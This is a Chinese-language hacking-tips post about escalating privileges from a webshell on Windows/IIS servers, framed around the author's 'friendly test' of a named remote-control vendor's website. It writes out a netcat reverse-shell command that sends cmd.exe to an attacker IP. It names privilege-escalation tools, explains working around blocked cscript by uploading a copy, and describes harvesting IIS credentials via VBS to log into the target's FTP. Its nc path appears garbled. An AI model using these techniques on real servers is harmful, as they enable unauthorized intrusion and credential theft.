webshell下提权两个小技巧分享

Webshell提权：细节决定成败

在网络安全领域，webshell提权一直是攻击者关注的焦点。当我们谈及cmd路径，如"c:\windows\temp\cmd.exe"，以及nc在同一目录下的操作时，可能会遇到一些挑战。例如，尝试通过"c:\windows\tempc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"来反弹cmdshell通常不会成功，但直接在cmd路径上执行c:\windows\tempc.exe，然后输入-vv ip 999 -e c:\windows\temp\cmd.exe却能如愿以偿。这背后的细节值得我们深入。

这些并不是我们的重点。在实际操作中，当我们执行如pr.exe或Churrasco.exe时，有时也需要采用上述方法才能成功。这些经验都是实战中积累的宝贵财富，能帮助我们更好地理解和掌握webshell提权的技巧。

接下来，我们要谈论的是一个友情检测波尔远程控制官方网站的话题。作者MYC00l [Y.D.T]分享了他的经验。

第一处细节是关于代码执行的问题。作者提到把代码保存为1.vbs后上传到服务器上，执行cscript 1.vbs却遭到拒绝。这时，我们其实可以尝试上传一个cscript.exe来解决这个问题。这个程序位于系统文件夹下，是win32控制台下的脚本宿主引擎，用于执行vbs等脚本程序，它可能帮助我们成功执行脚本。

第二处细节则涉及到VBS脚本与IIS帐号密码的关联。通过VBS脚本获取到目标IIS帐号和密码后，作者在CMD下FTP发现目标使用的是微软FTP，直接用IIS帐号和密码就能登录进去。这一发现揭示了一个重要的知识点：IIS帐号和密码与微软自带的FTP帐号和密码默认是一致的。这一细节对于我们进行网络渗透和攻击具有重要的参考价值。

在网络安全的道路上，每一个细节都可能成为决定成败的关键。只有深入理解和掌握这些技巧，才能更好地应对各种网络挑战。希望通过分享这些webshell提权的小技巧，能对大家在网络安全领域的有所帮助。